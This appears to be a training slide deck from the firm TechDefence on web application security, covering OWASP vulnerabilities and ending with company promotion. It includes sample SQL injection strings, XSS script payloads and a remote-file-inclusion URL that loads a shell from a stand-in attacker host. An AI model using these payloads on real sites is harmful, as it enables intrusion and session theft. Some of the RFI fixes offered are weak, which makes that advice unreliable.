Professional Documents
Culture Documents
Session Flow
What is Web Application Security? Security Misconceptions Reasons for Attacking Web Applications OWASP Top 10 Vulnerabilities Security guidelines Web Application Security checklist
Problem Illustration
Application Layer
Attacker sends attacks inside valid HTTP requests Your custom code is tricked into doing something it should not Security requires software development expertise, not signatures
Application Layer
Communication Knowledge Mgmt E-Commerce Bus. Functions Legacy Systems Administration Transactions Human Resrcs Web Services Directories Databases Accounts Finance
APPLICATION ATTACK
Custom Code
Billing
Network Layer
Firewall, hardening, patching, IDS, and SSL cannot detect or stop attacks inside HTTP requests. Security relies on signature databases
Network Layer
Hardened OS
Firewall
Insider
Firewall
Security Misconceptions
The Firewall protects my web server and database Access to the server through ports 80 and 443 makes the web server part of your external perimeter defense Vulnerabilities in the web server software or web applications may allow access to internal network resources
Security Misconceptions
The IDS protects my web server and database The IDS is configured to detect signatures of various well-known attacks Attack signatures do not include those for attacks against custom applications
Security Misconceptions
SSL secures my site SSL secures the transport of data between the web server and the users browser. SSL does not protect against attacks against the server and applications. SSL is the hackers best friend due to the false sense of security
Vulnerability Used
OWASP Top 10 Vulnerabilities 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. Injection Flaws Cross Site Scripting (XSS) Malicious File Execution Insecure Direct Object Reference Cross Site Request Forgery (CSRF) Information Leakage and Improper Error Handling Broken Authentication and Session Management Insecure Cryptographic Storage Insecure Communications Failure to Restrict URL Access
Injection Flaws
Injection means Tricking an application into including unintended commands in the data sent to an interpreter Interpreters Take strings and interpret them as commands SQL, OS Shell, LDAP, XPath, etc SQL injection is still quite common Many applications still susceptible
Custom Code
Attacker enters SQL fragments into a web page that uses input in a query 2 3
Administration Transactions
Accounts Finance
Database
Injection Flaws
SELECT * FROM Account: Account: Account Summary accounts WHERE SKU: SKU: acct= OR 1=1-Acct:5424-6066-2134 4334 1. Application presents a form to the attacker all via SSL 2. Attacker sends an attack in the form data 3. Application forwards attack to the database in a SQL query 4.Database runs query containing attack and sends encrypted results back to application 5. Application decrypts data as normal and sends results to the user
Firewall
Legacy Systems
Administration Transactions
Application Layer
ATTACK
>M
DB Table
Directories
Human Resrcs
Web Services
Databases
Accounts Finance
>
Firewall
Billing
SQL Injection
It is a flaw in "web application" development, it is not a DB or web server problem. Most programmers are still not aware of this problem A lot of the tutorials & demo templates are vulnerable Even worse, a lot of solutions posted on the Internet are not good enough. In our pen tests over 60% of our clients turn out to be vulnerable to SQL Injection
SQL Injection
Common vulnerable login query SELECT * FROM users WHERE login = 'victor' AND password = '123 (If it returns something then login!) ASP/MS SQL Server login syntax var sql = "SELECT * FROM users WHERE login = '" + formusr + "' AND password = '" + formpwd + "'";
SQL Injection
Injecting Through Strings formusr = ' or 1=1 formpwd = anything Final query would look like this: SELECT * FROM users WHERE username = ' ' or 1=1 AND password = 'anything'
SQL Injection
The Power of It closes the string parameter. Everything after is considered part of the SQL command. SELECT * FROM clients WHERE account = 12345678 AND pin = 1111 PHP/MySQL login syntax $sql = "SELECT * FROM clients WHERE " . "account = $formacct AND " . "pin = $formpin";
SQL Injection
Injecting Numeric Fields $formacct = 1 or 1=1 # $formpin = 1111 Final query would look like this: SELECT * FROM clients WHERE account = 1 or 1=1 # AND pin = 1111
SQL Injection
Standard SQL commands such as "Select , "Insert, "Update, "Delete, "Create", and "Drop" can be used to accomplish almost everything that one needs to do with a database. When you click a link like this, www.site.com/news.asp?ArticleID=10, The link tells the site to look in the table that stores the article names for an article whos "ArticleID" is 10.
SQL Injection
The "INFORMATION_SCHEMA" holds the names of every table and column on a site. On every SQL server there will be an "INFORMATION_SCHEMA" and its name will never change.
SQL Injection
Reflected XSS
http://www.boi.com
<script>alert(document.cookie)</script> Site reflects the script back to user where it executes and displays the session cookie in a pop-up.
Finding XSS
Most Common Blogs, Forums, Shout boxes, Comment Boxes, Search Box's, there are too many to mention. Using 'Google Dorks search inurl: "search.php?q=" XSS Examples
http://site.com/search.php?q=<script>alert("XSS")</script> http://site.com/search.php?q=<script>window.open( "http://www.google.com/" )</script>
XSS
XSS Demo
Stored XSS
1
Attacker sets the trap update my profile Application with stored XSS vulnerability
Custom Code
Script runs inside victims browser with full access to the DOM and cookies 3
Script silently sends attacker Victims session cookie
Administration Transactions
Accounts Finance
Attacker enters a malicious script into a web page that stores the data on the server
Finding XSS
XSS Demo
Attacker sends request that specifies the path to a malicious file in a parameter
Attacker views results of executing the attack, or takes control of the affected server
PHP application includes the specified file and executes the contents
Accounts Finance
Custom Code
File System
RFI
If allow_url_include is on in php.ini, we can inject a shell directly. You only need to load by GET or POST directly to an URI with the shell (using a non PHP extension): Like http://www.techdefence.com/index.php?page=news.php Now if the Index.php has Remote File Inclusion like <?php include($_GET[page]); ?> So the above URL is written like http://www.techdefence.com/index.php?page=http://www.evilscript.com/ shell.txt
Fixing RFI
Practice Secure Coding Techniques Instead of using $_GET use $_POST Filter all the pages and Give file permissions perfectly so that no one can access. Keep Safe Mode On in PHP. Disallow unused commands in linux environment
Applications can unintentionally leak information about their configuration, internal workings, or violate privacy through a variety of application problems. Applications can also leak internal state via how long they take to process certain operations or via different responses to differing inputs, such as displaying the same error text with different error numbers. Web applications will often leak information about their internal state through detailed or debug error messages.
Fixing Information Leakage & improper Error Handling Ensure that the entire software development team shares a common approach to exception handling. Disable or limit detailed error handling. In particular, do not display debug information to end users, stack traces, or path information. Ensure that secure paths that have multiple outcomes return similar or identical error messages in roughly the same time.
Vulnerability Scnners
Security Guidelines
1. 2. 3. 4. 5. 6. 7. 8. 9. Validate Input and Output Fail Securely (Closed) Keep it Simple Use and Reuse Trusted Components Defense in Depth Only as Secure as the Weakest Link Security By Obscurity Won't Work Least Privilege Compartmentalization (Separation of Privileges)
Fail Securely
When it fails, it fails closed. It should fail to a state that rejects all subsequent security requests. A good analogy is a firewall. If a firewall fails it should drop all subsequent packets
Keep It Simple
If a security system is too complex for its user base, it will either not be used or users will try to find measures to bypass it. This message applies equally to tasks that an administrator must perform in order to secure an application. This message is also intended for security layer API's that application developers must use to build the system.
Defence In Depth
Relying on one component to perform its function 100% of the time is unrealistic. While we hope to build software and hardware that works as planned, predicting the unexpected is difficult. Good systems don't predict the unexpected, but plan for it.
Least Privilege
Systems should be designed in such a way that they run with the least amount of system privilege they need to do their job.
Compartmentalizing users, processes and data helps contain problems if they do occur. Compartmentalization is an important concept widely adopted in the information security realm.
Session Management
Token protection Session Duration Idle time Duration Guess Session ID format Transfer in URL or BODY? Is Session Id linked to the IP address? Change Referrer tag
Backend Authentication
Trust relationships Encryption Plaintext password in HTML Password in configuration file.
XSS
Which type stored or reflected? Check for 404/500 error pages for return information. Input validation.
Misconfiguration
Nikto results Nessus results Patch level Directory listing Directory permission Error messages Default username/pass SSL cert. Configuration Debug or configuration Files Check for latest vulnerabilities
Unwanted
Backup files Defaults files Services Remote admin. Access
SQL Injection
Mirror website and search for all input parameters Gain database related information Error Messages Privileges given to the webserver or database
Access Points
Ability to brute force at the discovered access points. Ability to bypass auth. with spoofed tokens Ability to conduct replay attack. Forced browsing, does application keep a check by tracking request from each user.
Our Services
TechInvestigations A Cyber Crime Investigation unit
If you want to catch Criminal then Think like one Analysing, investigating and accumulating the digital evidence and cyber trails is better known as Cyber Crime Investigation. It can be found in computer hard disks, cell phones, CDs, DVDs, floppies, computer networks, the Internet etc. Make Law Enforcement or Government Agencies - Aware of the various Cyber Crimes!. Guide them - How to Prevent Cyber Crimes? Solve Cyber Crime Cases using our technical expertise for Law Enforcement Agencies. Aide them to Legally resolve and bring the Cyber Criminals (People who commit Cyber Crimes) to justice.
Our Services
TechInvestigation A Cyber Crime Investigation unit Our Recent Cases:
Ahmedabad Serial Bomb Blast Terror Mail case Traced out Terror Mail trail of Ahmedabad Serial Bomb Blast case. Cyber Investigation of Mumbai Blasts We have successfully accomplished task of getting confidential information from JAMAT UD DAWAH.
Our Services
TechHackscan A Vulnerability Assessment & Penetration Testing unit
Where you will see the facilities, we see the flaws As Penetration tester & Website Security Auditor, we evaluate security of clients websites through simulation of a controlled and managed intrusion into your system by a malicious user, known as a cracker. We will assure that our active analysis of the websites for any potential vulnerability that may result from poor or improper system configuration, development is going to be carried out. We submit Developer as well as remediation report.
Our Services
TechForensics A Cyber Forensics Unit
With the right application of science and technology for acquisition, preservation, identification, analysis, and presentation of digital evidence or data in a way, we preserve the integrity of the digital information blending it with the legal acceptability. We provide the highest quality instructor interactive training to help legal firms, accounting firms, government and law enforcement agencies for better performance in the cyber forensic matters. We can also work on Framework Development for Cyber Forensics Labs (CFL)
Our Services
Training & Workshops
TechDefence Certified Cyber Security Expert. NASSCOM Predicts requirement of 1,88,000 security professionals by 2010,currently the number of security professionals in india is arount 22,000. CCSE is Career oriented hands on training program on Advanced Ethical Hacking, Cyber Crime Investigation, Cyber Forensics & Penetration Testing.
Our Clients
Private Sector VAPT Computer Clinic - Mauritius Multievents Ltd - Mauritius Noble Ventures USA Future Group Mid Day, Delhi Govt Sector Crime Branch, Ahmedabad ATS, Mumbai URICM, Gandhi Nagar Chief Ministers Office, Government of Gujarat
Our Clients
Corporate Workshops Hackintosh 2009 YAHOO!, Google, K7 Antivirus, ZOHO, KPMG, HCL, TCS Delloitte , ISACA,T Temenos.
TechDefence Labs
A Research & Development Unit focusing on Secure Software Development,
Client Security Product, Security Product Development. TechDefence Projects to offer HIDS (Host based Intrusion Detection System). Centralized Cyber Caf Monitoring & Reporting System. File Encrypter. Online VAPT Scanner. Online Multi Antivirus Scanner.
Thank You
sunny@techdefence.com